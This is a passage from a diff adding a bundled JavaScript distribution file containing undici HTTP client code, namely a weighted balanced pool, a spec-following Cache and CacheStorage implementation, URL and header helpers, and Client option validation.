upstreamOrigin = parseOrigin(upstream).origin + + if (this[kClients].find((pool) => ( + pool[kUrl].origin === upstreamOrigin && + pool.closed !== true && + pool.destroyed !== true + ))) { + return this + } + const pool = this[kFactory](upstreamOrigin, Object.assign({}, this[kOptions])) + + this[kAddClient](pool) + pool.on('connect', () => { + pool[kWeight] = Math.min(this[kMaxWeightPerServer], pool[kWeight] + this[kErrorPenalty]) + }) + + pool.on('connectionError', () => { + pool[kWeight] = Math.max(1, pool[kWeight] - this[kErrorPenalty]) + this._updateBalancedPoolStats() + }) + + pool.on('disconnect', (...args) => { + const err = args[2] + if (err && err.code === 'UND_ERR_SOCKET') { + // decrease the weight of the pool. + pool[kWeight] = Math.max(1, pool[kWeight] - this[kErrorPenalty]) + this._updateBalancedPoolStats() + } + }) + + for (const client of this[kClients]) { + client[kWeight] = this[kMaxWeightPerServer] + } + + this._updateBalancedPoolStats() + + return this + } + + _updateBalancedPoolStats () { + this[kGreatestCommonDivisor] = this[kClients].map(p => p[kWeight]).reduce(getGreatestCommonDivisor, 0) + } + + removeUpstream (upstream) { + const upstreamOrigin = parseOrigin(upstream).origin + + const pool = this[kClients].find((pool) => ( + pool[kUrl].origin === upstreamOrigin && + pool.closed !== true && + pool.destroyed !== true + )) + + if (pool) { + this[kRemoveClient](pool) + } + + return this + } + + get upstreams () { + return this[kClients] + .filter(dispatcher => dispatcher.closed !== true && dispatcher.destroyed !== true) + .map((p) => p[kUrl].origin) + } + + [kGetDispatcher] () { + // We validate that pools is greater than 0, + // otherwise we would have to wait until an upstream + // is added, which might never happen. + if (this[kClients].length === 0) { + throw new BalancedPoolMissingUpstreamError() + } + + const dispatcher = this[kClients].find(dispatcher => ( + !dispatcher[kNeedDrain] && + dispatcher.closed !== true && + dispatcher.destroyed !== true + )) + + if (!dispatcher) { + return + } + + const allClientsBusy = this[kClients].map(pool => pool[kNeedDrain]).reduce((a, b) => a && b, true) + + if (allClientsBusy) { + return + } + + let counter = 0 + + let maxWeightIndex = this[kClients].findIndex(pool => !pool[kNeedDrain]) + + while (counter++ < this[kClients].length) { + this[kIndex] = (this[kIndex] + 1) % this[kClients].length + const pool = this[kClients][this[kIndex]] + + // find pool index with the largest weight + if (pool[kWeight] > this[kClients][maxWeightIndex][kWeight] && !pool[kNeedDrain]) { + maxWeightIndex = this[kIndex] + } + + // decrease the current weight every `this[kClients].length`. + if (this[kIndex] === 0) { + // Set the current weight to the next lower weight. + this[kCurrentWeight] = this[kCurrentWeight] - this[kGreatestCommonDivisor] + + if (this[kCurrentWeight] <= 0) { + this[kCurrentWeight] = this[kMaxWeightPerServer] + } + } + if (pool[kWeight] >= this[kCurrentWeight] && (!pool[kNeedDrain])) { + return pool + } + } + + this[kCurrentWeight] = this[kClients][maxWeightIndex][kWeight] + this[kIndex] = maxWeightIndex + return this[kClients][maxWeightIndex] + } +} + +module.exports = BalancedPool + + +/***/ }), + +/***/ 6101: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { kConstruct } = __nccwpck_require__(9174) +const { urlEquals, fieldValues: getFieldValues } = __nccwpck_require__(2396) +const { kEnumerableProperty, isDisturbed } = __nccwpck_require__(3983) +const { kHeadersList } = __nccwpck_require__(2785) +const { webidl } = __nccwpck_require__(1744) +const { Response, cloneResponse } = __nccwpck_require__(7823) +const { Request } = __nccwpck_require__(8359) +const { kState, kHeaders, kGuard, kRealm } = __nccwpck_require__(5861) +const { fetching } = __nccwpck_require__(4881) +const { urlIsHttpHttpsScheme, createDeferredPromise, readAllBytes } = __nccwpck_require__(2538) +const assert = __nccwpck_require__(9491) +const { getGlobalDispatcher } = __nccwpck_require__(1892) + +/** + * @see https://w3c.github.io/ServiceWorker/#dfn-cache-batch-operation + * @typedef {Object} CacheBatchOperation + * @property {'delete' | 'put'} type + * @property {any} request + * @property {any} response + * @property {import('../../types/cache').CacheQueryOptions} options + */ + +/** + * @see https://w3c.github.io/ServiceWorker/#dfn-request-response-list + * @typedef {[any, any][]} requestResponseList + */ + +class Cache { + /** + * @see https://w3c.github.io/ServiceWorker/#dfn-relevant-request-response-list + * @type {requestResponseList} + */ + #relevantRequestResponseList + + constructor () { + if (arguments[0] !== kConstruct) { + webidl.illegalConstructor() + } + + this.#relevantRequestResponseList = arguments[1] + } + + async match (request, options = {}) { + webidl.brandCheck(this, Cache) + webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.match' }) + + request = webidl.converters.RequestInfo(request) + options = webidl.converters.CacheQueryOptions(options) + + const p = await this.matchAll(request, options) + + if (p.length === 0) { + return + } + + return p[0] + } + + async matchAll (request = undefined, options = {}) { + webidl.brandCheck(this, Cache) + + if (request !== undefined) request = webidl.converters.RequestInfo(request) + options = webidl.converters.CacheQueryOptions(options) + + // 1. + let r = null + + // 2. + if (request !== undefined) { + if (request instanceof Request) { + // 2.1.1 + r = request[kState] + + // 2.1.2 + if (r.method !== 'GET' && !options.ignoreMethod) { + return [] + } + } else if (typeof request === 'string') { + // 2.2.1 + r = new Request(request)[kState] + } + } + + // 5. + // 5.1 + const responses = [] + + // 5.2 + if (request === undefined) { + // 5.2.1 + for (const requestResponse of this.#relevantRequestResponseList) { + responses.push(requestResponse[1]) + } + } else { // 5.3 + // 5.3.1 + const requestResponses = this.#queryCache(r, options) + + // 5.3.2 + for (const requestResponse of requestResponses) { + responses.push(requestResponse[1]) + } + } + + // 5.4 + // We don't implement CORs so we don't need to loop over the responses, yay! + + // 5.5.1 + const responseList = [] + + // 5.5.2 + for (const response of responses) { + // 5.5.2.1 + const responseObject = new Response(response.body?.source ?? null) + const body = responseObject[kState].body + responseObject[kState] = response + responseObject[kState].body = body + responseObject[kHeaders][kHeadersList] = response.headersList + responseObject[kHeaders][kGuard] = 'immutable' + + responseList.push(responseObject) + } + + // 6. + return Object.freeze(responseList) + } + + async add (request) { + webidl.brandCheck(this, Cache) + webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.add' }) + + request = webidl.converters.RequestInfo(request) + + // 1. + const requests = [request] + + // 2. + const responseArrayPromise = this.addAll(requests) + + // 3. + return await responseArrayPromise + } + + async addAll (requests) { + webidl.brandCheck(this, Cache) + webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.addAll' }) + + requests = webidl.converters['sequence'](requests) + + // 1. + const responsePromises = [] + + // 2. + const requestList = [] + + // 3. + for (const request of requests) { + if (typeof request === 'string') { + continue + } + + // 3.1 + const r = request[kState] + + // 3.2 + if (!urlIsHttpHttpsScheme(r.url) || r.method !== 'GET') { + throw webidl.errors.exception({ + header: 'Cache.addAll', + message: 'Expected http/s scheme when method is not GET.' + }) + } + } + + // 4. + /** @type {ReturnType[]} */ + const fetchControllers = [] + + // 5. + for (const request of requests) { + // 5.1 + const r = new Request(request)[kState] + + // 5.2 + if (!urlIsHttpHttpsScheme(r.url)) { + throw webidl.errors.exception({ + header: 'Cache.addAll', + message: 'Expected http/s scheme.' + }) + } + + // 5.4 + r.initiator = 'fetch' + r.destination = 'subresource' + + // 5.5 + requestList.push(r) + + // 5.6 + const responsePromise = createDeferredPromise() + + // 5.7 + fetchControllers.push(fetching({ + request: r, + dispatcher: getGlobalDispatcher(), + processResponse (response) { + // 1. + if (response.type === 'error' || response.status === 206 || response.status < 200 || response.status > 299) { + responsePromise.reject(webidl.errors.exception({ + header: 'Cache.addAll', + message: 'Received an invalid status code or the request failed.' + })) + } else if (response.headersList.contains('vary')) { // 2. + // 2.1 + const fieldValues = getFieldValues(response.headersList.get('vary')) + + // 2.2 + for (const fieldValue of fieldValues) { + // 2.2.1 + if (fieldValue === '*') { + responsePromise.reject(webidl.errors.exception({ + header: 'Cache.addAll', + message: 'invalid vary field value' + })) + + for (const controller of fetchControllers) { + controller.abort() + } + + return + } + } + } + }, + processResponseEndOfBody (response) { + // 1. + if (response.aborted) { + responsePromise.reject(new DOMException('aborted', 'AbortError')) + return + } + + // 2. + responsePromise.resolve(response) + } + })) + + // 5.8 + responsePromises.push(responsePromise.promise) + } + + // 6. + const p = Promise.all(responsePromises) + + // 7. + const responses = await p + + // 7.1 + const operations = [] + + // 7.2 + let index = 0 + + // 7.3 + for (const response of responses) { + // 7.3.1 + /** @type {CacheBatchOperation} */ + const operation = { + type: 'put', // 7.3.2 + request: requestList[index], // 7.3.3 + response // 7.3.4 + } + + operations.push(operation) // 7.3.5 + + index++ // 7.3.6 + } + + // 7.5 + const cacheJobPromise = createDeferredPromise() + + // 7.6.1 + let errorData = null + + // 7.6.2 + try { + this.#batchCacheOperations(operations) + } catch (e) { + errorData = e + } + + // 7.6.3 + queueMicrotask(() => { + // 7.6.3.1 + if (errorData === null) { + cacheJobPromise.resolve(undefined) + } else { + // 7.6.3.2 + cacheJobPromise.reject(errorData) + } + }) + + // 7.7 + return cacheJobPromise.promise + } + + async put (request, response) { + webidl.brandCheck(this, Cache) + webidl.argumentLengthCheck(arguments, 2, { header: 'Cache.put' }) + + request = webidl.converters.RequestInfo(request) + response = webidl.converters.Response(response) + + // 1. + let innerRequest = null + + // 2. + if (request instanceof Request) { + innerRequest = request[kState] + } else { // 3. + innerRequest = new Request(request)[kState] + } + + // 4. + if (!urlIsHttpHttpsScheme(innerRequest.url) || innerRequest.method !== 'GET') { + throw webidl.errors.exception({ + header: 'Cache.put', + message: 'Expected an http/s scheme when method is not GET' + }) + } + + // 5. + const innerResponse = response[kState] + + // 6. + if (innerResponse.status === 206) { + throw webidl.errors.exception({ + header: 'Cache.put', + message: 'Got 206 status' + }) + } + + // 7. + if (innerResponse.headersList.contains('vary')) { + // 7.1. + const fieldValues = getFieldValues(innerResponse.headersList.get('vary')) + + // 7.2. + for (const fieldValue of fieldValues) { + // 7.2.1 + if (fieldValue === '*') { + throw webidl.errors.exception({ + header: 'Cache.put', + message: 'Got * vary field value' + }) + } + } + } + + // 8. + if (innerResponse.body && (isDisturbed(innerResponse.body.stream) || innerResponse.body.stream.locked)) { + throw webidl.errors.exception({ + header: 'Cache.put', + message: 'Response body is locked or disturbed' + }) + } + + // 9. + const clonedResponse = cloneResponse(innerResponse) + + // 10. + const bodyReadPromise = createDeferredPromise() + + // 11. + if (innerResponse.body != null) { + // 11.1 + const stream = innerResponse.body.stream + + // 11.2 + const reader = stream.getReader() + + // 11.3 + readAllBytes(reader).then(bodyReadPromise.resolve, bodyReadPromise.reject) + } else { + bodyReadPromise.resolve(undefined) + } + + // 12. + /** @type {CacheBatchOperation[]} */ + const operations = [] + + // 13. + /** @type {CacheBatchOperation} */ + const operation = { + type: 'put', // 14. + request: innerRequest, // 15. + response: clonedResponse // 16. + } + + // 17. + operations.push(operation) + + // 19. + const bytes = await bodyReadPromise.promise + + if (clonedResponse.body != null) { + clonedResponse.body.source = bytes + } + + // 19.1 + const cacheJobPromise = createDeferredPromise() + + // 19.2.1 + let errorData = null + + // 19.2.2 + try { + this.#batchCacheOperations(operations) + } catch (e) { + errorData = e + } + + // 19.2.3 + queueMicrotask(() => { + // 19.2.3.1 + if (errorData === null) { + cacheJobPromise.resolve() + } else { // 19.2.3.2 + cacheJobPromise.reject(errorData) + } + }) + + return cacheJobPromise.promise + } + + async delete (request, options = {}) { + webidl.brandCheck(this, Cache) + webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.delete' }) + + request = webidl.converters.RequestInfo(request) + options = webidl.converters.CacheQueryOptions(options) + + /** + * @type {Request} + */ + let r = null + + if (request instanceof Request) { + r = request[kState] + + if (r.method !== 'GET' && !options.ignoreMethod) { + return false + } + } else { + assert(typeof request === 'string') + + r = new Request(request)[kState] + } + + /** @type {CacheBatchOperation[]} */ + const operations = [] + + /** @type {CacheBatchOperation} */ + const operation = { + type: 'delete', + request: r, + options + } + + operations.push(operation) + + const cacheJobPromise = createDeferredPromise() + + let errorData = null + let requestResponses + + try { + requestResponses = this.#batchCacheOperations(operations) + } catch (e) { + errorData = e + } + + queueMicrotask(() => { + if (errorData === null) { + cacheJobPromise.resolve(!!requestResponses?.length) + } else { + cacheJobPromise.reject(errorData) + } + }) + + return cacheJobPromise.promise + } + + /** + * @see https://w3c.github.io/ServiceWorker/#dom-cache-keys + * @param {any} request + * @param {import('../../types/cache').CacheQueryOptions} options + * @returns {readonly Request[]} + */ + async keys (request = undefined, options = {}) { + webidl.brandCheck(this, Cache) + + if (request !== undefined) request = webidl.converters.RequestInfo(request) + options = webidl.converters.CacheQueryOptions(options) + + // 1. + let r = null + + // 2. + if (request !== undefined) { + // 2.1 + if (request instanceof Request) { + // 2.1.1 + r = request[kState] + + // 2.1.2 + if (r.method !== 'GET' && !options.ignoreMethod) { + return [] + } + } else if (typeof request === 'string') { // 2.2 + r = new Request(request)[kState] + } + } + + // 4. + const promise = createDeferredPromise() + + // 5. + // 5.1 + const requests = [] + + // 5.2 + if (request === undefined) { + // 5.2.1 + for (const requestResponse of this.#relevantRequestResponseList) { + // 5.2.1.1 + requests.push(requestResponse[0]) + } + } else { // 5.3 + // 5.3.1 + const requestResponses = this.#queryCache(r, options) + + // 5.3.2 + for (const requestResponse of requestResponses) { + // 5.3.2.1 + requests.push(requestResponse[0]) + } + } + + // 5.4 + queueMicrotask(() => { + // 5.4.1 + const requestList = [] + + // 5.4.2 + for (const request of requests) { + const requestObject = new Request('https://a') + requestObject[kState] = request + requestObject[kHeaders][kHeadersList] = request.headersList + requestObject[kHeaders][kGuard] = 'immutable' + requestObject[kRealm] = request.client + + // 5.4.2.1 + requestList.push(requestObject) + } + + // 5.4.3 + promise.resolve(Object.freeze(requestList)) + }) + + return promise.promise + } + + /** + * @see https://w3c.github.io/ServiceWorker/#batch-cache-operations-algorithm + * @param {CacheBatchOperation[]} operations + * @returns {requestResponseList} + */ + #batchCacheOperations (operations) { + // 1. + const cache = this.#relevantRequestResponseList + + // 2. + const backupCache = [...cache] + + // 3. + const addedItems = [] + + // 4.1 + const resultList = [] + + try { + // 4.2 + for (const operation of operations) { + // 4.2.1 + if (operation.type !== 'delete' && operation.type !== 'put') { + throw webidl.errors.exception({ + header: 'Cache.#batchCacheOperations', + message: 'operation type does not match "delete" or "put"' + }) + } + + // 4.2.2 + if (operation.type === 'delete' && operation.response != null) { + throw webidl.errors.exception({ + header: 'Cache.#batchCacheOperations', + message: 'delete operation should not have an associated response' + }) + } + + // 4.2.3 + if (this.#queryCache(operation.request, operation.options, addedItems).length) { + throw new DOMException('???', 'InvalidStateError') + } + + // 4.2.4 + let requestResponses + + // 4.2.5 + if (operation.type === 'delete') { + // 4.2.5.1 + requestResponses = this.#queryCache(operation.request, operation.options) + + // TODO: the spec is wrong, this is needed to pass WPTs + if (requestResponses.length === 0) { + return [] + } + + // 4.2.5.2 + for (const requestResponse of requestResponses) { + const idx = cache.indexOf(requestResponse) + assert(idx !== -1) + + // 4.2.5.2.1 + cache.splice(idx, 1) + } + } else if (operation.type === 'put') { // 4.2.6 + // 4.2.6.1 + if (operation.response == null) { + throw webidl.errors.exception({ + header: 'Cache.#batchCacheOperations', + message: 'put operation should have an associated response' + }) + } + + // 4.2.6.2 + const r = operation.request + + // 4.2.6.3 + if (!urlIsHttpHttpsScheme(r.url)) { + throw webidl.errors.exception({ + header: 'Cache.#batchCacheOperations', + message: 'expected http or https scheme' + }) + } + + // 4.2.6.4 + if (r.method !== 'GET') { + throw webidl.errors.exception({ + header: 'Cache.#batchCacheOperations', + message: 'not get method' + }) + } + + // 4.2.6.5 + if (operation.options != null) { + throw webidl.errors.exception({ + header: 'Cache.#batchCacheOperations', + message: 'options must not be defined' + }) + } + + // 4.2.6.6 + requestResponses = this.#queryCache(operation.request) + + // 4.2.6.7 + for (const requestResponse of requestResponses) { + const idx = cache.indexOf(requestResponse) + assert(idx !== -1) + + // 4.2.6.7.1 + cache.splice(idx, 1) + } + + // 4.2.6.8 + cache.push([operation.request, operation.response]) + + // 4.2.6.10 + addedItems.push([operation.request, operation.response]) + } + + // 4.2.7 + resultList.push([operation.request, operation.response]) + } + + // 4.3 + return resultList + } catch (e) { // 5. + // 5.1 + this.#relevantRequestResponseList.length = 0 + + // 5.2 + this.#relevantRequestResponseList = backupCache + + // 5.3 + throw e + } + } + + /** + * @see https://w3c.github.io/ServiceWorker/#query-cache + * @param {any} requestQuery + * @param {import('../../types/cache').CacheQueryOptions} options + * @param {requestResponseList} targetStorage + * @returns {requestResponseList} + */ + #queryCache (requestQuery, options, targetStorage) { + /** @type {requestResponseList} */ + const resultList = [] + + const storage = targetStorage ?? this.#relevantRequestResponseList + + for (const requestResponse of storage) { + const [cachedRequest, cachedResponse] = requestResponse + if (this.#requestMatchesCachedItem(requestQuery, cachedRequest, cachedResponse, options)) { + resultList.push(requestResponse) + } + } + + return resultList + } + + /** + * @see https://w3c.github.io/ServiceWorker/#request-matches-cached-item-algorithm + * @param {any} requestQuery + * @param {any} request + * @param {any | null} response + * @param {import('../../types/cache').CacheQueryOptions | undefined} options + * @returns {boolean} + */ + #requestMatchesCachedItem (requestQuery, request, response = null, options) { + // if (options?.ignoreMethod === false && request.method === 'GET') { + // return false + // } + + const queryURL = new URL(requestQuery.url) + + const cachedURL = new URL(request.url) + + if (options?.ignoreSearch) { + cachedURL.search = '' + + queryURL.search = '' + } + + if (!urlEquals(queryURL, cachedURL, true)) { + return false + } + + if ( + response == null || + options?.ignoreVary || + !response.headersList.contains('vary') + ) { + return true + } + + const fieldValues = getFieldValues(response.headersList.get('vary')) + + for (const fieldValue of fieldValues) { + if (fieldValue === '*') { + return false + } + + const requestValue = request.headersList.get(fieldValue) + const queryValue = requestQuery.headersList.get(fieldValue) + + // If one has the header and the other doesn't, or one has + // a different value than the other, return false + if (requestValue !== queryValue) { + return false + } + } + + return true + } +} + +Object.defineProperties(Cache.prototype, { + [Symbol.toStringTag]: { + value: 'Cache', + configurable: true + }, + match: kEnumerableProperty, + matchAll: kEnumerableProperty, + add: kEnumerableProperty, + addAll: kEnumerableProperty, + put: kEnumerableProperty, + delete: kEnumerableProperty, + keys: kEnumerableProperty +}) + +const cacheQueryOptionConverters = [ + { + key: 'ignoreSearch', + converter: webidl.converters.boolean, + defaultValue: false + }, + { + key: 'ignoreMethod', + converter: webidl.converters.boolean, + defaultValue: false + }, + { + key: 'ignoreVary', + converter: webidl.converters.boolean, + defaultValue: false + } +] + +webidl.converters.CacheQueryOptions = webidl.dictionaryConverter(cacheQueryOptionConverters) + +webidl.converters.MultiCacheQueryOptions = webidl.dictionaryConverter([ + ...cacheQueryOptionConverters, + { + key: 'cacheName', + converter: webidl.converters.DOMString + } +]) + +webidl.converters.Response = webidl.interfaceConverter(Response) + +webidl.converters['sequence'] = webidl.sequenceConverter( + webidl.converters.RequestInfo +) + +module.exports = { + Cache +} + + +/***/ }), + +/***/ 7907: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { kConstruct } = __nccwpck_require__(9174) +const { Cache } = __nccwpck_require__(6101) +const { webidl } = __nccwpck_require__(1744) +const { kEnumerableProperty } = __nccwpck_require__(3983) + +class CacheStorage { + /** + * @see https://w3c.github.io/ServiceWorker/#dfn-relevant-name-to-cache-map + * @type {Map} + */ + async has (cacheName) { + webidl.brandCheck(this, CacheStorage) + webidl.argumentLengthCheck(arguments, 1, { header: 'CacheStorage.has' }) + + cacheName = webidl.converters.DOMString(cacheName) + + // 2.1.1 + // 2.2 + return this.#caches.has(cacheName) + } + + /** + * @see https://w3c.github.io/ServiceWorker/#dom-cachestorage-open + * @param {string} cacheName + * @returns {Promise} + */ + async open (cacheName) { + webidl.brandCheck(this, CacheStorage) + webidl.argumentLengthCheck(arguments, 1, { header: 'CacheStorage.open' }) + + cacheName = webidl.converters.DOMString(cacheName) + + // 2.1 + if (this.#caches.has(cacheName)) { + // await caches.open('v1') !== await caches.open('v1') + + // 2.1.1 + const cache = this.#caches.get(cacheName) + + // 2.1.1.1 + return new Cache(kConstruct, cache) + } + + // 2.2 + const cache = [] + + // 2.3 + this.#caches.set(cacheName, cache) + + // 2.4 + return new Cache(kConstruct, cache) + } + + /** + * @see https://w3c.github.io/ServiceWorker/#cache-storage-delete + * @param {string} cacheName + * @returns {Promise} + */ + async delete (cacheName) { + webidl.brandCheck(this, CacheStorage) + webidl.argumentLengthCheck(arguments, 1, { header: 'CacheStorage.delete' }) + + cacheName = webidl.converters.DOMString(cacheName) + + return this.#caches.delete(cacheName) + } + + /** + * @see https://w3c.github.io/ServiceWorker/#cache-storage-keys + * @returns {string[]} + */ + async keys () { + webidl.brandCheck(this, CacheStorage) + + // 2.1 + const keys = this.#caches.keys() + + // 2.2 + return [...keys] + } +} + +Object.defineProperties(CacheStorage.prototype, { + [Symbol.toStringTag]: { + value: 'CacheStorage', + configurable: true + }, + match: kEnumerableProperty, + has: kEnumerableProperty, + open: kEnumerableProperty, + delete: kEnumerableProperty, + keys: kEnumerableProperty +}) + +module.exports = { + CacheStorage +} + + +/***/ }), + +/***/ 9174: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +module.exports = { + kConstruct: (__nccwpck_require__(2785).kConstruct) +} + + +/***/ }), + +/***/ 2396: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const assert = __nccwpck_require__(9491) +const { URLSerializer } = __nccwpck_require__(685) +const { isValidHeaderName } = __nccwpck_require__(2538) + +/** + * @see https://url.spec.whatwg.org/#concept-url-equals + * @param {URL} A + * @param {URL} B + * @param {boolean | undefined} excludeFragment + * @returns {boolean} + */ +function urlEquals (A, B, excludeFragment = false) { + const serializedA = URLSerializer(A, excludeFragment) + + const serializedB = URLSerializer(B, excludeFragment) + + return serializedA === serializedB +} + +/** + * @see https://github.com/chromium/chromium/blob/694d20d134cb553d8d89e5500b9148012b1ba299/content/browser/cache_storage/cache_storage_cache.cc#L260-L262 + * @param {string} header + */ +function fieldValues (header) { + assert(header !== null) + + const values = [] + + for (let value of header.split(',')) { + value = value.trim() + + if (!value.length) { + continue + } else if (!isValidHeaderName(value)) { + continue + } + + values.push(value) + } + + return values +} + +module.exports = { + urlEquals, + fieldValues +} + + +/***/ }), + +/***/ 3598: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; +// @ts-check + + + +/* global WebAssembly */ + +const assert = __nccwpck_require__(9491) +const net = __nccwpck_require__(1808) +const http = __nccwpck_require__(3685) +const { pipeline } = __nccwpck_require__(2781) +const util = __nccwpck_require__(3983) +const timers = __nccwpck_require__(9459) +const Request = __nccwpck_require__(2905) +const DispatcherBase = __nccwpck_require__(4839) +const { + RequestContentLengthMismatchError, + ResponseContentLengthMismatchError, + InvalidArgumentError, + RequestAbortedError, + HeadersTimeoutError, + HeadersOverflowError, + SocketError, + InformationalError, + BodyTimeoutError, + HTTPParserError, + ResponseExceededMaxSizeError, + ClientDestroyedError +} = __nccwpck_require__(8045) +const buildConnector = __nccwpck_require__(2067) +const { + kUrl, + kReset, + kServerName, + kClient, + kBusy, + kParser, + kConnect, + kBlocking, + kResuming, + kRunning, + kPending, + kSize, + kWriting, + kQueue, + kConnected, + kConnecting, + kNeedDrain, + kNoRef, + kKeepAliveDefaultTimeout, + kHostHeader, + kPendingIdx, + kRunningIdx, + kError, + kPipelining, + kSocket, + kKeepAliveTimeoutValue, + kMaxHeadersSize, + kKeepAliveMaxTimeout, + kKeepAliveTimeoutThreshold, + kHeadersTimeout, + kBodyTimeout, + kStrictContentLength, + kConnector, + kMaxRedirections, + kMaxRequests, + kCounter, + kClose, + kDestroy, + kDispatch, + kInterceptors, + kLocalAddress, + kMaxResponseSize, + kHTTPConnVersion, + // HTTP2 + kHost, + kHTTP2Session, + kHTTP2SessionState, + kHTTP2BuildRequest, + kHTTP2CopyHeaders, + kHTTP1BuildRequest +} = __nccwpck_require__(2785) + +/** @type {import('http2')} */ +let http2 +try { + http2 = __nccwpck_require__(5158) +} catch { + // @ts-ignore + http2 = { constants: {} } +} + +const { + constants: { + HTTP2_HEADER_AUTHORITY, + HTTP2_HEADER_METHOD, + HTTP2_HEADER_PATH, + HTTP2_HEADER_SCHEME, + HTTP2_HEADER_CONTENT_LENGTH, + HTTP2_HEADER_EXPECT, + HTTP2_HEADER_STATUS + } +} = http2 + +// Experimental +let h2ExperimentalWarned = false + +const FastBuffer = Buffer[Symbol.species] + +const kClosedResolve = Symbol('kClosedResolve') + +const channels = {} + +try { + const diagnosticsChannel = __nccwpck_require__(7643) + channels.sendHeaders = diagnosticsChannel.channel('undici:client:sendHeaders') + channels.beforeConnect = diagnosticsChannel.channel('undici:client:beforeConnect') + channels.connectError = diagnosticsChannel.channel('undici:client:connectError') + channels.connected = diagnosticsChannel.channel('undici:client:connected') +} catch { + channels.sendHeaders = { hasSubscribers: false } + channels.beforeConnect = { hasSubscribers: false } + channels.connectError = { hasSubscribers: false } + channels.connected = { hasSubscribers: false } +} + +/** + * @type {import('../types/client').default} + */ +class Client extends DispatcherBase { + /** + * + * @param {string|URL} url + * @param {import('../types/client').Client.Options} options + */ + constructor (url, { + interceptors, + maxHeaderSize, + headersTimeout, + socketTimeout, + requestTimeout, + connectTimeout, + bodyTimeout, + idleTimeout, + keepAlive, + keepAliveTimeout, + maxKeepAliveTimeout, + keepAliveMaxTimeout, + keepAliveTimeoutThreshold, + socketPath, + pipelining, + tls, + strictContentLength, + maxCachedSessions, + maxRedirections, + connect, + maxRequestsPerClient, + localAddress, + maxResponseSize, + autoSelectFamily, + autoSelectFamilyAttemptTimeout, + // h2 + allowH2, + maxConcurrentStreams + } = {}) { + super() + + if (keepAlive !== undefined) { + throw new InvalidArgumentError('unsupported keepAlive, use pipelining=0 instead') + } + + if (socketTimeout !== undefined) { + throw new InvalidArgumentError('unsupported socketTimeout, use headersTimeout & bodyTimeout instead') + } + + if (requestTimeout !== undefined) { + throw new InvalidArgumentError('unsupported requestTimeout, use headersTimeout & bodyTimeout instead') + } + + if (idleTimeout !== undefined) { + throw new InvalidArgumentError('unsupported idleTimeout, use keepAliveTimeout instead') + } + + if (maxKeepAliveTimeout !== undefined) { + throw new InvalidArgumentError('unsupported maxKeepAliveTimeout, use keepAliveMaxTimeout instead') + } + + if (maxHeaderSize != null && !Number.isFinite(maxHeaderSize)) { + throw new InvalidArgumentError('invalid maxHeaderSize') + } + + if (socketPath != null && typeof socketPath !== 'string') { + throw new InvalidArgumentError('invalid socketPath') + } + + if (connectTimeout != null && (!Number.isFinite(connectTimeout) || connectTimeout < 0)) { + throw new InvalidArgumentError('invalid connectTimeout') + } + + if (keepAliveTimeout != null && (!Number.isFinite(keepAliveTimeout) || keepAliveTimeout <= 0)) { + throw new InvalidArgumentError('invalid keepAliveTimeout') + } + + if (keepAliveMaxTimeout != null && (!Number.isFinite(keepAliveMaxTimeout) || keepAliveMaxTimeout <= 0)) { + throw new InvalidArgumentError('invalid keepAliveMaxTimeout') + } + + if (keepAliveTimeoutThreshold != null && !Number.isFinite(keepAliveTimeoutThreshold)) { + throw new InvalidArgumentError('invalid keepAliveTimeoutThreshold') + } + + if (headersTimeout != null && (!Number.isInteger(headersTimeout) || headersTimeout < 0)) { + throw new InvalidArgumentError('headersTimeout must be a positive integer or zero') + } + + if (bodyTimeout != null && (!Number.isInteger(bodyTimeout) || bodyTimeout < 0)) { + throw new InvalidArgumentError('bodyTimeout must be a positive integer or zero') + } + + if (connect != null && typeof connect !== 'function' && typeof connect !== 'object') { + throw new InvalidArgumentError('connect must be a function or an object') + } + + if (maxRedirections != null && (!Number.isInteger(maxRedirections) || maxRedirections < 0)) { + throw new InvalidArgumentError('maxRedirections must be a positive number') + } + + if (maxRequestsPerClient != null && (!Number.isInteger(maxRequestsPerClient) || maxRequestsPerClient < 0)) { + throw new InvalidArgumentError('maxRequestsPerClient must be a positive number') + } + + if (localAddress != null && (typeof localAddress !== 'string' || net.isIP(localAddress) === 0)) { + throw new InvalidArgumentError('localAddress must be valid string IP address') + } + + if (maxResponseSize != null && (!Number.isInteger(maxResponseSize) || maxResponseSize < -1)) { + throw new InvalidArgumentError('maxResponseSize must be a positive number') + } + + if ( + autoSelectFamilyAttemptTimeout != null && + (!Number.isInteger(autoSelectFamilyAttemptTimeout) || autoSelectFamilyAttemptTimeout < -1) + ) { + throw new InvalidArgumentError('autoSelectFamilyAttemptTimeout must be a positive number') + } + + // h2 + if (allowH2 != null && typeof allowH2 !== 'boolean') { + throw new InvalidArgumentError('allowH2 must be a valid boolean value') + } + + if (maxConcurrentStreams != null && (typeof maxConcurrentStreams !== 'number' || maxConcurrentStreams < 1)) { + throw new InvalidArgumentError('maxConcurrentStreams must be a possitive integer, greater than 0') + } + + if (typeof connect !== 'function') { + connect = buildConnector({ + ...tls, + maxCachedSessions, + allowH2, + socketPath, + timeout: connectTimeout, + ...(util.nodeHasAutoSelectFamily && autoSelectFamily ? { autoSelectFamily, autoSelectFamilyAttemptTimeout } : undefined), + ...connect + }) + } + + this[kInterceptors] = interceptors && interceptors.Client && Array.isArray(interceptors.Client) + ? interceptors.Client + : [createRedirectInterceptor({ maxRedirections })] + this[kUrl] = util.parseOrigin(url) + this[kConnector] = connect + this[kSocket] = null + this[kPipelining] = pipelining != null ? pipelining : 1 + this[kMaxHeadersSize] = maxHeaderSize || http.maxHeaderSize + this[kKeepAliveDefaultTimeout] = keepAliveTimeout == null ? 4e3 : keepAliveTimeout + this[kKeepAliveMaxTimeout] = keepAliveMaxTimeout == null ? 600e3 : keepAliveMaxTimeout + this[kKeepAliveTimeoutThreshold] = keepAliveTimeoutThreshold == null ? 1e3 : keepAliveTimeoutThreshold + this[kKeepAliveTimeoutValue] = this[kKeepAliveDefaultTimeout] + this[kServerName] = null + this[kLocalAddress] = localAddress != null ? localAddress : null + this[kResuming] = 0 // 0, idle, 1, scheduled, 2 resuming + this[kNeedDrain] = 0 // 0, idle, 1, scheduled, 